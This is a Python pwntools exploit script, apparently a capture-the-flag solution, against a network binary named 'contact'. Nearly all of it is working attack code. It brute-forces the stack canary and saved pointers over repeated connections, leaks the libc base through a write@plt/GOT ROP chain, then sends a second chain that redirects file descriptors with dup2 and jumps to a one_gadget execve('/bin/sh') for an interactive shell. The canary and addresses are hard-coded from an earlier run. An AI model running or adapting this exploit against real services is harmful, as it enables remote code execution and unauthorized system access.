- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- from struct import pack
# Target binary under test; the same ELF object is also stored in
# ``context.binary`` so pwntools can take its defaults from it.
exe = context.binary = ELF('contact')
# NOTE(review): this assignment is dead -- ``libc`` is rebound on the very
# next line to an explicitly chosen libc path.
libc = exe.libc
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Connection target: pwntools command-line args (HOST=... PORT=...) win,
# otherwise fall back to a local listener on 1337.
host = args.HOST or '127.0.0.1'
port = int(args.PORT or 1337)
def remote(argv=[], *a, **kw):
    '''Open a TCP connection to ``host``:``port`` and return the tube.

    ``argv``, ``*a`` and ``**kw`` are accepted only so the signature matches
    ``start()``; a remote connection has no use for them.
    '''
    return connect(host, port)
def start(argv=[], *a, **kw):
    '''Obtain a tube to the target; every caller in this script goes through here.

    All arguments are forwarded unchanged to ``remote()``, which is the only
    launch path defined in this file.
    '''
    tube = remote(argv, *a, **kw)
    return tube
# Recover the 8 bytes (saved rbp) that follow ``payload``, one byte at a time.
def bruteforce(payload):
    '''Recover the 8 bytes that sit directly after ``payload`` on the target.

    For every position all 256 values are tried, each over a fresh
    connection; a guess is kept as soon as the service still answers with a
    line after receiving it.  Logging is silenced while the loop runs and
    restored to ``'info'`` afterwards.

    Returns the bytes recovered so far (shorter than 8 if some position
    never produced an answer).
    '''
    found = ''
    context.log_level = 'error'
    for _position in range(8):
        for guess in range(256):
            candidate = found + chr(guess)
            io = start()
            io.recvline()
            io.send(payload + candidate)
            try:
                io.recvline()
                found = candidate
                print("bytes: " + hex(u64(found.ljust(8, '\x00'))))
                break
            except:
                continue
            finally:
                io.close()
    context.log_level = 'info'
    return found
# Recover the stack canary that follows ``payload``; its first byte is taken
# to be zero, so only 7 bytes are actually guessed.
def bruteforce_canary(payload):
    '''Recover the 8-byte canary that sits directly after ``payload``.

    The leading byte is fixed to a zero byte and not guessed.  Each of the
    remaining seven positions is tried with all 256 values over a fresh
    connection; a guess is kept when the service still replies with a line
    afterwards.  Logging is silenced during the loop and reset to ``'info'``.

    Returns the canary bytes recovered so far.
    '''
    canary = '\x00'
    context.log_level = 'error'
    for _position in range(7):
        for guess in range(256):
            candidate = canary + chr(guess)
            io = start()
            io.recvline()
            # If the byte is correct Done. will be returned
            io.send(payload + candidate)
            try:
                io.recvline()
                canary = candidate
                print("canary: " + hex(u64(canary.ljust(8, '\x00'))))
                break
            except:
                continue
            finally:
                io.close()
    context.log_level = 'info'
    return canary
- # Use this one_gadget and not write manual ROP chains
- # 0x4f322 execve("/bin/sh", rsp+0x40, environ)
- # constraints:
- # [rsp+0x40] == NULL
- # -- Exploit goes here --
- # Plan of action:
- # Using fd
- # First fill stack with stuff up to address 0x38
- # Bruteforce the 8-byte canary starting with \x00
- # Bruteforce the 8-byte rbp starting with \x7f (or potentially \x7d or \x7e so bruteforce an extra 2 bits)
- # Bruteforce the 8-byte return address (according to will should begin with a 55 or 56)
- # ROP Chain:
- # Get .text base by subtracting the return address with its offset in the ELF binary
- # leak libc using write@plt(4, write@got, 8)
- # Get libc base by subtracting the offset from write in libc ELF binary
- # Get dup2's address
- # call dup2(0, 4)
- # call dup2(1, 4)
- # call dup2(2, 4)
- # call the one_gadget
# 0x38 bytes of filler: everything that sits in front of the saved canary.
payload = fit({}, length=0x38)
# Brute force canary
# canary = bruteforce_canary(payload)
# NOTE(review): canary, rbp and ret below are pinned constants taken from an
# earlier run, in place of the helper calls commented out above; with
# per-process canaries and ASLR they are only meaningful for that one run.
canary = p64(0x2e51750513e03a00)
log.info('final canary: ' + hex(u64(canary)))
payload += canary
# Brute force rbp
# rbp = bruteforce(payload)
rbp = p64(0x7ffd889dae00)
log.info('final rbp: ' + hex(u64(rbp)))
payload += rbp
# Brute force return address
# ret = bruteforce(payload)
ret = p64(0x55fdc4aee502)
log.info('final ret: ' + hex(u64(ret)))
# Get .text base
# 0x1502 is the file offset of the return site (see the plan above); rebasing
# ``exe`` lets ``exe.plt`` / ``exe.got`` below resolve to runtime addresses.
aslr_base = u64(ret) - 0x1502 # ELF is loaded to an address that ends in three 000s
exe.address = aslr_base
log.info('ELF begins at ' + hex(exe.address))
# Leak libc by calling write@plt(4, write@got, 8)
rop1 = ROP(exe)
rop1.call(exe.plt.write, [4, exe.got.write, 8])
log.info('write@plt(4, write@got, 8):\n' + rop1.dump())
payload += rop1.chain()
payload += p64(exe.address + 0x159a) # Return back into the vulnerable function to send another payload
# First round trip: the 8 bytes that come back are the runtime address of
# ``write`` inside libc, from which the libc base is derived.
io = start()
io.recvline()
io.sendline(payload)
leak = u64(io.recv(8))
libc_base = leak - libc.sym.write
libc.address = libc_base
log.info('leaked libc base: ' + hex(libc_base))
# Second payload: same filler, canary and rbp prefix as the first one.
payload2 = fit({}, length=0x38) + canary + rbp
rop4 = ROP([exe, libc])
rop4.close(libc.sym.close, [0])
rop4.close(libc.sym.close, [1])
log.info('close([0,1]):\n' + rop4.dump())
payload2 += rop4.chain()
rop2 = ROP([exe, libc])
rop2.call(libc.sym.dup2, [4, 0])
rop2.call(libc.sym.dup2, [4, 1])
log.info('dup2(4, [0, 1]):\n' + rop2.dump())
payload2 += rop2.chain()
rop3 = ROP([exe, libc])
# Raw libc-relative address appended after the dup2 frames.
rop3.raw(libc.address + 0x4f2c5)
log.info('execve("/bin/sh", rsp+0x40, environ):\n' + rop3.dump())
payload2 += rop3.chain()
# Deliver the second chain on the still-open connection, then hand the
# tube over to the user.
io.sendline(payload2)
io.interactive()